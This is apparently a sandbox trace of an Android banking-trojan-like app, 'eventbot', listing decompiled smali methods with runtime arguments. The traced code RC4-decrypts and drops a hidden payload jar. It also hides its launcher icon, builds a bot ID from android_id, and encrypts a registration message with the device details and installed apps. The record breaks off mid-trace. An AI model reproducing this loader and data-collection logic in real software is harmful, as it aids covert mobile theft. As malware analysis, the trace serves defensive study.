                        3try_start_3: new-instance v2, Ljava/io/BufferedInputStream;
                        5invoke-virtual {p0}, Lcom/example/eventbot/service;->getAssets()Landroid/content/res/AssetManager;
                        6move-result-object v3
                        8invoke-virtual {v3, p2}, Landroid/content/res/AssetManager;->open(Ljava/lang/String;)Ljava/io/InputStream;
                        9move-result-object p2
                        11invoke-direct {v2, p2}, Ljava/io/BufferedInputStream;-><init>(Ljava/io/InputStream;)V
                        12try_end_10: new-instance p2, Ljava/io/BufferedOutputStream;
                        13new-instance v3, Ljava/io/FileOutputStream;
                        15invoke-direct {v3, p1}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
                        • Time: 133088
                          • This:
                            • java.io.FileOutputStream@3021b1d
                          • p0: /data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar
                          • Return:
                            • java.io.FileOutputStream@3021b1d
                        17invoke-direct {p2, v3}, Ljava/io/BufferedOutputStream;-><init>(Ljava/io/OutputStream;)V
                        18try_start_1a:
                        19invoke-virtual {v2}, Ljava/io/BufferedInputStream;->available()I
                        20move-result p1
                        21new-array p1, p1, [B
                        23invoke-virtual {v2, p1}, Ljava/io/BufferedInputStream;->read([B)I
                        25invoke-virtual {v2}, Ljava/io/BufferedInputStream;->close()V
                        27invoke-static {v0}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
                        • Time: 133104
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@662a763
                        28move-result-object v1
                        29const/4 v3, 0x2
                        30new-instance v4, Ljavax/crypto/spec/SecretKeySpec;
                        32sget-object v5, Lcom/example/eventbot/cfg;->gatePublicKey:Ljava/lang/String;
                        34invoke-virtual {v5}, Ljava/lang/String;->getBytes()[B
                        35move-result-object v5
                        37invoke-direct {v4, v5, v0}, Ljavax/crypto/spec/SecretKeySpec;-><init>([BLjava/lang/String;)V
                        • Time: 133399
                          • This:
                            • javax.crypto.spec.SecretKeySpec@3b9f3
                          • p0: [B@daa4c19
                          • p0: 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                          • p0: 37653839303133646134363630633136326161653161363234303830656234386233333065373134386633326230313035383639393737363134616666643633
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@3b9f3
                        39invoke-virtual {v1, v3, v4}, Ljavax/crypto/Cipher;->init(ILjava/security/Key;)V
                        41invoke-virtual {v1, p1}, Ljavax/crypto/Cipher;->doFinal([B)[B
                        • Time: 133655
                          • This:
                            • javax.crypto.Cipher@662a763
                          • p0: [B@90834de
                          • p0: '"xuuRP20H-,LQByKGE4n/6obFu-7$6/+yPF| H=#Y1C;|QDR~G,}#7di91BEKtGzj3~5jDE}2d>u+E)E/!Wk4P atd[~[|_tU>~Pu =KQ[i7xY(gs];}kxDM!5RrH("LlJtP@qqN'5bNPtd[d?r</y]| -e<J_^B=#~SuW#atuJo/9E)N@WPG"23]`QLL n)5AjETKlB,Oav\uO{>E(pX:2%,8[w) #qUc-'O3a{A/2!k4<"Bjw3S1|(;g?==*pKoE4J4+8e]tP*'S01dq,p*VX/P76qw{fB\2Be+6QVmKC1j0#\q~Xnv,J5rihG1O iX[<ZM`[v>d7:J%iO0S,lIT3s_Nl*sXY.}8e5D$wb$z9{|%_P<SN)Y1CA1fY)9Kje#p
                          • p0: CCED27E822CA0004AF7806757516E1F1BD52509DB6323093EA482D1C932CCBFDB74CA39451429979019F11AE4B01FC47839345348C1AEA6E952FF636949BCE6F62A7D51446750B152D3724B7C9F4C4C910BCB6F6362F2BC50EB7790750FE0C9D9A031619C9467CED20D782154818A4FBCCF03D23FE590BB293C8E331433B7C5197B6D94487D2FDDB8FF5527E91472CB57D23BEBA18F137DBFFDCD3A216CDB208646939B5F4D9049DCD31EC42454BCCA8E6B7D18A19CC7447BE7A94056A0DE033B411F1F6CC7EF035C98E92036A01A24445E97D3264003E75C2AD2BC2A345291CCF8D45D9FDF32F218D576B1B34502061746488E45BCA7E5B921C7CED0A5F74B9553EF67EB6DAACDE50C29591AC75AA9B201A3D8D000593854BC051D7B3CE5B1669DC0CFB91D8FFB4371C12A08696E60E0178592867739B5D3BD47D8CF50C6BB495DC1DCC788044874D21809635F0D552724828229C034C6C834A747FC350B740CAA9098DEC7171BD4E2735624EEA50F2EAA774B364CD04CF0F5B643FAA87BA72923C2FE0795DE5BE800D7C202D65C43CD0A74AA4A95F5E0542DC3D99237E537515FA1457239803610F9374A7CFA393D875814A6FD30A2FD6C5B50EE71FFB3945D529FDCF4E40CF5750B5064722E232D3EC9CB133135D60DC14FC514CF78EEA4C8C206E29C9ADBD35038A41AF6A45D154DD4BB51581E86CB5DB42F19CBC152C4F
                          • Return:
                            • [B@a4e56bf
                            • PK9mPMETA-INF/MANIFEST.MFMLK-.K-*R03rION,%$Vr9&:UZ)Trr%p525uL``QbkWYQYgl2PKPK9mPMETA-INF/ANDROID.SFuMO0;G)"/B d)`~zx3~?k:AxG"!YC9X;X+Er/mk9eQkuXf\IL2@&ckLBBPh[lwkAN-..\u=tkLHIYouH.SFqk('->|ZlPK:PK9mPMETA-INF/ANDROID.RSA3hbiAr&Llm,LX40hbar}A25N16dceaf66q8s22D@y%ya| q.av73BD@NF1DK55002404661565074r1M@q&FFk%YVx7T}g=+f_[<not~;e.?(}M[+8)UQBC,?uc&_X~%veG>[6O-r*\O?E@^\qsI)8QqkzVocw>r5<={
                            • 504B0304140008080800390E6D50000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E57249ADD0F5C94F4E2C010B25E7241617A716EBA5A456F0723917A52696A4A6E83A555A29A45400951B9AF172F172F925E6A6A2A90CF670D4353235D375C94C07DA60A5601A905162E46B1612101AE69793E457A59FEE97591299ECEAE9111A519C98EF1E59951DE91E14EA6796926C0B321200504B0708E5AAC51A8A0000009C000000504B0304140008080800390E6D50000000000000000000000000130000004D4554412D494E462F414E44524F49442E534675CF4D4F833000C6F13B09DFA1470D29222FCD42B203AC20B0E1A664CBB68B29A36095D1D116827E7AB77833F1F69C7EF93F056B3AA20641E18E0AC978E78347D3D2B52209A0ED21885943A58239E958FD3B580703A5042B0745A50F0CE772D82F6D6BB939AFF2B6C2BD81868A6551886B1BEB1AD875940F0DDFAE5818E366FEAFEC035CE2AEE7BC988C494CDF3240E526196303ED8FEFA16B0C8C4C0E42A3E40E8AAECC4250A26805C3AF5BF1CCB4DE6CD706776B414E2D050B2E2E5C10753D74AF6BBAF64CCED407A7964849A559D1E96F870FFADC75482EAD17EF5346D1716B1DD6A92812272DEBCCCB9E0A9A3E7CBC5ACE6C8CDDF98DFC01504B070882BBFD19FA
                        42move-result-object p1
                        44invoke-virtual {p2, p1}, Ljava/io/OutputStream;->write([B)V
                        46invoke-virtual {p2}, Ljava/io/OutputStream;->close()V
                        47try_end_43: const/4 p1, 0x1
                        48goto/16 :goto_90
                        49catch_45: move-exception p1
                        50goto/16 :goto_65
                        51catch_47: move-exception p1
                        52move-object p2, v1
                        53goto/16 :goto_65
                        54catchall_4a: move-exception p1
                        56sget-object p2, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        57new-instance v0, Ljava/lang/StringBuilder;
                        59invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        61const-string v1, "[func] [service] [prepareLib] Throwable: "
                        63invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        65invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        67invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        68move-result-object p1
                        70invoke-static {p2, p1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        71goto/16 :goto_8f
                        72catch_62: move-exception p1
                        73move-object p2, v1
                        74move-object v2, p2
                        75goto_65:
                        76sget-object v0, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        77new-instance v1, Ljava/lang/StringBuilder;
                        79invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        81const-string v3, "[func] [service] [prepareLib] IOException: "
                        83invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        85invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        87invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        88move-result-object p1
                        90invoke-static {v0, p1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        91if-eqz p2, :cond_85
                        92try_start_7d:
                        93invoke-virtual {p2}, Ljava/io/OutputStream;->close()V
                        94try_end_80: goto/16 :goto_85
                        95catch_81: move-exception p1
                        97invoke-virtual {p1}, Ljava/io/IOException;->printStackTrace()V
                        98goto_85: if-eqz v2, :cond_8f
                        99try_start_87:
                        100invoke-virtual {v2}, Ljava/io/BufferedInputStream;->close()V
                        101try_end_8a: goto/16 :goto_8f
                        102catch_8b: move-exception p1
                        104invoke-virtual {p1}, Ljava/io/IOException;->printStackTrace()V
                        105goto_8f: const/4 p1, 0x0
                        106goto_90: return p1
                        APIs
                        • android.content.Context.getPackageManager
                        • android.content.Context.getPackageName
                        • java.lang.StringBuilder.<init>
                        • android.content.Context.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.ComponentName.<init>
                        • android.content.pm.PackageManager.setComponentEnabledSetting
                        Strings
                        • com.example.eventbot
                        • .MainActivity
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2const/4 v1, 0x0
                        4invoke-virtual {p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
                        5move-result-object v2
                        6if-eqz v2, :cond_2d
                        7new-instance v1, Landroid/content/ComponentName;
                        9invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        • Time: 149739
                          • This:
                            • com.example.eventbot.service@5c14a30
                          • Return:
                            • com.example.eventbot
                        10move-result-object v3
                        11new-instance v4, Ljava/lang/StringBuilder;
                        13invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        15invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        • Time: 149743
                          • This:
                            • com.example.eventbot.service@5c14a30
                          • Return:
                            • com.example.eventbot
                        16move-result-object v5
                        18invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        19move-result-object v4
                        21const-string v5, ".MainActivity"
                        23invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        24move-result-object v4
                        26invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        27move-result-object v4
                        29invoke-direct {v1, v3, v4}, Landroid/content/ComponentName;-><init>(Ljava/lang/String;Ljava/lang/String;)V
                        30const/4 v3, 0x2
                        32invoke-virtual {v2, v1, v3, v0}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
                        • Time: 149745
                          • This:
                            • android.app.ApplicationPackageManager@664a6f0
                          • p0: 2
                          • p1: 1
                          • Return:
                            • ComponentInfo{com.example.eventbot/com.example.eventbot.MainActivity}
                        33goto_2c: return v0
                        34cond_2d: move v0, v1
                        35goto/16 :goto_2c
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.<init>
                        • android.os.Build.MANUFACTURER:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • android.os.Build.MODEL:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • android.os.Build.MODEL:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.example.eventbot.service.md5
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • .jar
                        Position Instruction Meta Information
                        0new-instance v0, Ljava/lang/StringBuilder;
                        2invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        3new-instance v1, Ljava/lang/StringBuilder;
                        5invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        7sget-object v2, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
                        9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        11sget-object v2, Landroid/os/Build;->MODEL:Ljava/lang/String;
                        13invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        15sget-object v2, Landroid/os/Build;->MODEL:Ljava/lang/String;
                        17invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        19invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        20move-result-object v1
                        22invoke-virtual {p0, v1}, Lcom/example/eventbot/service;->md5(Ljava/lang/String;)Ljava/lang/String;
                        • Time: 132906
                          • This:
                            • MD5 Message Digest from AndroidOpenSSL, <initialized>
                          • Return:
                            • [B@d83fb73
                            • 18t]
                            • DFE931BCBAF10AB88B1C3895AB745DC6
                        23move-result-object v1
                        25invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        27const-string v1, ".jar"
                        29invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        31invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        32move-result-object v0
                        33return-object v0
                        Cross References
                        APIs
                        • java.lang.String.<init>
                        • java.security.MessageDigest.getInstance
                        • java.lang.String.getBytes
                        • java.security.MessageDigest.update
                        • java.security.MessageDigest.digest
                        • java.lang.StringBuffer.<init>
                        • java.lang.Integer.toHexString
                        • java.lang.StringBuffer.append
                        • java.lang.StringBuffer.toString
                        Strings
                        • MD5
                        Position Instruction Meta Information
                        0new-instance v0, Ljava/lang/String;
                        2invoke-direct {v0}, Ljava/lang/String;-><init>()V
                        3try_start_5:
                        4const-string v1, "MD5"
                        6invoke-static {v1}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
                        • Time: 132876
                          • p0: MD5
                          • Return:
                            • MD5 Message Digest from AndroidOpenSSL, <initialized>
                        7move-result-object v1
                        9invoke-virtual {p1}, Ljava/lang/String;->getBytes()[B
                        10move-result-object p1
                        12invoke-virtual {v1, p1}, Ljava/security/MessageDigest;->update([B)V
                        • Time: 132889
                          • This:
                            • MD5 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@9776be2
                          • p0: samsungGalaxy NexusGalaxy Nexus
                          • p0: 73616D73756E6747616C617879204E6578757347616C617879204E65787573
                        • Time: 133000
                          • This:
                            • MD5 Message Digest from AndroidOpenSSL, <initialized>
                          • p0: [B@27165eb
                          • p0: samsungGalaxy Nexus
                          • p0: 73616D73756E6747616C617879204E65787573
                        14invoke-virtual {v1}, Ljava/security/MessageDigest;->digest()[B
                        15move-result-object p1
                        16new-instance v1, Ljava/lang/StringBuffer;
                        18invoke-direct {v1}, Ljava/lang/StringBuffer;-><init>()V
                        19const/4 v2, 0x0
                        20goto_1c: array-length v3, p1
                        21if-ge v2, v3, :cond_2d
                        22aget-byte v3, p1, v2
                        23and-int/lit16 v3, v3, 0xff
                        25invoke-static {v3}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        26move-result-object v3
                        28invoke-virtual {v1, v3}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;
                        29add-int/lit8 v2, v2, 0x1
                        30goto/16 :goto_1c
                        31cond_2d:
                        32invoke-virtual {v1}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;
                        33move-result-object v0
                        34catchall_31: return-object v0
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.<init>
                        • android.os.Build.MANUFACTURER:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • android.os.Build.MODEL:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.example.eventbot.service.md5
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • .jar
                        Position Instruction Meta Information
                        0new-instance v0, Ljava/lang/StringBuilder;
                        2invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        3new-instance v1, Ljava/lang/StringBuilder;
                        5invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        7sget-object v2, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
                        9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        11sget-object v2, Landroid/os/Build;->MODEL:Ljava/lang/String;
                        13invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        15invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        16move-result-object v1
                        18invoke-virtual {p0, v1}, Lcom/example/eventbot/service;->md5(Ljava/lang/String;)Ljava/lang/String;
                        • Time: 133004
                          • This:
                            • MD5 Message Digest from AndroidOpenSSL, <initialized>
                          • Return:
                            • [B@6182f48
                            • rdl!f
                            • 72F5ED646CC01B83BC93E921E3660FE0
                        19move-result-object v1
                        21invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        23const-string v1, ".jar"
                        25invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        27invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        28move-result-object v0
                        29return-object v0
                        Cross References
                        APIs
                        • android.content.Context.getContentResolver
                        • android.provider.Settings$Secure.getString
                        • java.lang.String.equals
                        • java.lang.String.equals
                        Strings
                        • android_id
                        • b8e688b87ab41f9
                        • botUidPrefs
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-virtual {p1}, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
                        3move-result-object v0
                        5const-string v1, "android_id"
                        7invoke-static {v0, v1}, Landroid/provider/Settings$Secure;->getString(Landroid/content/ContentResolver;Ljava/lang/String;)Ljava/lang/String;
                        • Time: 149812
                          • p0: android.app.ContextImpl$ApplicationContentResolver@3ecef9e
                          • p1: android_id
                          • Return:
                            • b8e688b87ab41f9
                        8move-result-object v0
                        9if-eqz v0, :cond_14
                        11const-string v1, ""
                        13invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        14move-result v1
                        15if-eqz v1, :cond_2f
                        16cond_14:
                        17const-string v0, "botUidPrefs"
                        19invoke-virtual {p0, p1, v0}, Lcom/lib;->getBotUID(Landroid/content/Context;Ljava/lang/String;)Ljava/lang/String;
                        20move-result-object v0
                        21if-eqz v0, :cond_24
                        23const-string v1, ""
                        25invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        26move-result v1
                        27if-eqz v1, :cond_2f
                        28cond_24: const/16 v0, 0x10
                        30invoke-static {v0}, Lcom/lib;->randStr(I)Ljava/lang/String;
                        31move-result-object v0
                        33const-string v1, "botUidPrefs"
                        35invoke-virtual {p0, p1, v1, v0}, Lcom/lib;->writeBotUID(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        36cond_2f: return-object v0
                        Cross References
                        APIs
                        • javax.crypto.Cipher.getInstance
                        • java.lang.String.getBytes
                        • javax.crypto.spec.SecretKeySpec.<init>
                        • javax.crypto.Cipher.init
                        • javax.crypto.Cipher.doFinal
                        Strings
                        • RC4
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3const-string v1, "RC4"
                        5invoke-static {v1}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
                        • Time: 151086
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@c6f152f
                        • Time: 163994
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@bfbff82
                        • Time: 186502
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@a66a17c
                        • Time: 200839
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@52520e
                        • Time: 222580
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@12f1b64
                        • Time: 235591
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@b4de563
                        • Time: 257471
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@9820d8f
                        • Time: 270340
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@d185575
                        • Time: 291948
                          • p0: RC4
                          • Return:
                            • javax.crypto.Cipher@f5aff35
                        6move-result-object v1
                        7const/4 v2, 0x2
                        8new-instance v3, Ljavax/crypto/spec/SecretKeySpec;
                        10invoke-virtual {p1}, Ljava/lang/String;->getBytes()[B
                        11move-result-object v4
                        13const-string v5, "RC4"
                        15invoke-direct {v3, v4, v5}, Ljavax/crypto/spec/SecretKeySpec;-><init>([BLjava/lang/String;)V
                        • Time: 151091
                          • This:
                            • javax.crypto.spec.SecretKeySpec@462f
                          • p0: [B@5e80cc5
                          • p0: bef1b6f57e61d4f5a7c6a65daf01947669d4da5b0822c60e037890d08659271b
                          • p0: 62656631623666353765363164346635613763366136356461663031393437363639643464613562303832326336306530333738393064303836353932373162
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@462f
                        • Time: 164007
                          • This:
                            • javax.crypto.spec.SecretKeySpec@38584
                          • p0: [B@a3016d0
                          • p0: 3205745bf8cbbe2704e5eae238b6871bb8efbb5ffc40a6e1545a543c79c6f31e
                          • p0: 33323035373435626638636262653237303465356561653233386236383731626238656662623566666334306136653135343561353433633739633666333165
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@38584
                        • Time: 186504
                          • This:
                            • javax.crypto.spec.SecretKeySpec@3e4e4
                          • p0: [B@d90ea5a
                          • p0: 86e549439e1c3e7e88bc7e996fc9f25dde14e8e97d1fbf5a32d8afaf0c8803ce
                          • p0: 38366535343934333965316333653765383862633765393936666339663235646465313465386539376431666266356133326438616661663063383830336365
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@3e4e4
                        • Time: 200841
                          • This:
                            • javax.crypto.spec.SecretKeySpec@47b5
                          • p0: [B@3d82a3c
                          • p0: 213b20c8d0e867fb85bb17a263aa22095fa688e69fc8083c87450123d7937a95
                          • p0: 32313362323063386430653836376662383562623137613236336161323230393566613638386536396663383038336338373435303132336437393337613935
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@47b5
                        • Time: 222595
                          • This:
                            • javax.crypto.spec.SecretKeySpec@3b288
                          • p0: [B@3f07a82
                          • p0: 98cbcfa7e768985420813052d72974ea431a3af720d5e558552db8027d73b99b
                          • p0: 39386362636661376537363839383534323038313330353264373239373465613433316133616637323064356535353835353264623830323764373362393962
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@3b288
                        • Time: 235593
                          • This:
                            • javax.crypto.spec.SecretKeySpec@39733
                          • p0: [B@172ba19
                          • p0: 38f78e3f4b824216a41c1791cea41fbb424bbbd3999dd697f668ae1a75302c8c
                          • p0: 33386637386533663462383234323136613431633137393163656134316662623432346262626433393939646436393766363638616531613735333032633863
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@39733
                        • Time: 257474
                          • This:
                            • javax.crypto.spec.SecretKeySpec@3a332
                          • p0: [B@8d9ac25
                          • p0: 923ab776a1cf837d8a6d39f2d53acb7d403416d16048cce8012c13936ae3ae14
                          • p0: 39323361623737366131636638333764386136643339663264353361636237643430333431366431363034386363653830313263313339333661653361653134
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@3a332
                        • Time: 270345
                          • This:
                            • javax.crypto.spec.SecretKeySpec@38c1d
                          • p0: [B@449857b
                          • p0: e35ac4c1c29caf1077f8728e647b3e41a5a785779626e0daab8d6542d49ebd9c
                          • p0: 65333561633463316332396361663130373766383732386536343762336534316135613738353737393632366530646161623864363534326434396562643963
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@38c1d
                        • Time: 291951
                          • This:
                            • javax.crypto.spec.SecretKeySpec@38ac9
                          • p0: [B@73ea53b
                          • p0: 39e2cde0b96afbc4a74a79f712e05dd35c4b0476ab50f4dc240e033e7b4cb0a4
                          • p0: 33396532636465306239366166626334613734613739663731326530356464333563346230343736616235306634646332343065303333653762346362306134
                          • p1: RC4
                          • Return:
                            • javax.crypto.spec.SecretKeySpec@38ac9
                        17invoke-virtual {v1, v2, v3}, Ljavax/crypto/Cipher;->init(ILjava/security/Key;)V
                        19invoke-virtual {v1, p2}, Ljavax/crypto/Cipher;->doFinal([B)[B
                        • Time: 151094
                          • This:
                            • javax.crypto.Cipher@c6f152f
                          • p0: [B@d0fa61a
                          • p0: {"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.
                          • p0: 7B22726561736F6E223A22726567222C2264617461223A7B22554944223A22623865363838623837616234316639222C224F53223A22372E312E32222C224D4F44454C223A2273616D73756E67222C2256454E444F52223A2247616C617879204E65787573222C2241505053223A225B636F6D2E616E64726F69642E6374732E707269762E6374737368696D2C20636F6D2E676F6F676C652E616E64726F69642E796F75747562652C20636F6D2E676F6F676C652E616E64726F69642E6578742E73657276696365732C20636F6D2E6578616D706C652E616E64726F69642E7273737265616465722C20636F6D2E616E64726F69642E70726F7669646572732E74656C6570686F6E792C206F72672E616E64726F69645F7838362E616E616C79746963732C20636F6D2E676F6F676C652E616E64726F69642E676F6F676C65717569636B736561726368626F782C20636F6D2E616E64726F69642E70726F7669646572732E63616C656E6461722C20636F6D2E616E64726F69642E70726F7669646572732E6D656469612C20636F6D2E676F6F676C652E616E64726F69642E6F6E6574696D65696E697469616C697A65722C20636F6D2E676F6F676C652E616E64726F69642E6578742E7368617265642C20636F6D2E616E64726F69642E77616C6C706170657263726F707065722C206F72672E7A65726F786C61622E757469
                          • Return:
                            • [B@661d54b
                            • jo|m24,*j,Y/Fzqr6gz$#@JIOJgb^cKVTtqB6Uywxz u"'5)I&<W+:w1uBXX]!?<%g;\N')$#<-+Hl?1}^mklBX2%7"z|t_ CyID^&U% &w-!&#$2@D:^iq84l}sl{/=`Pq `|8cio3RJ?Eno6\{$f[RJW=Qk&2on4:;,*shSmlqa3Un9T,M<WHsF>st%]*w3my;$- q5AZ8+riN9q#=l>>o2Y*VG{sO&K&fJLF(eg&(4;GQG@im4Air6-$+*6$YQ8!6T0Lj_JpNv`^c|}:*|3YcCO[p}YyQ9w<X9jk&`>cs^?|J&(nZoypCF-`Cy79gW!w{m{0??#c+D=0o<0|rV5/CQ#EQX70wz[8:DXB$6W
                            • 91D8AFF7F46AAFBF6FD0DEB4F0AC7C6D32E7BF3408E4FD18ACA0942C0E2ACF6A1A2C59142F46878DABC2C2C6DCEBAC0F7AD071FD72150C9836847FF4A000E5F967BE9288A6D77AC1ECAAAA24D0A3CD23EAEB40924A8095DBB0EB490015DF084F0D4A8196B7C59CEBA76762C8C516A8DAA18E5EE78DB7B763BCEAAF994BEDE31056547471427F9A9A36B9E57F557998801A77787ACF0EFB2075222787063504DAAF8B1BD31A29074987B982EAB826853CE057162B3A7731C4D2CA8EB90275BFC3FA0E4258C59D58C65DC0D412AFD39AF5213F95F78717A3E38C3C1F25B9C867B7C8083BCC5C4E27BDFE29FA24233C95062D2B488E1215CE6CA8B13F31FD0C999BFB7D14A29A9B5ED4AC6DA36BC56C8EEFC112C54200FC58A232251437227A7C7402EB5FBE1C08FB00DB2043F0D8B7798C49FEE39A44D5C35E26552510C0209C1ACDA5B6BFB42604940999AD772D9E82B3212623241032F640C183A091D6443ACA5EF5A469711238A893346CC07D736CD6D1A67BF2B62F96AB3DD4B890F7D4B360B1C3507108B920FCFD607C38630B69F66F33B9DCF352ED4A8914D83F83D1DABACF15456E6F365C7B98F5249CCB6616CF5BFDB552F74AAAE157933D5118B26B268EC832C3A9EECEBA6F836E8F340B3A3B2C89C6192A8B7368F1C853BFAE6D126C197161335510186E3954F3F7022C0DDCB289D6929C4DF0C13CEDA5BAC05748F0
                        • Time: 164012
                          • This:
                            • javax.crypto.Cipher@bfbff82
                          • p0: [B@24d46c9
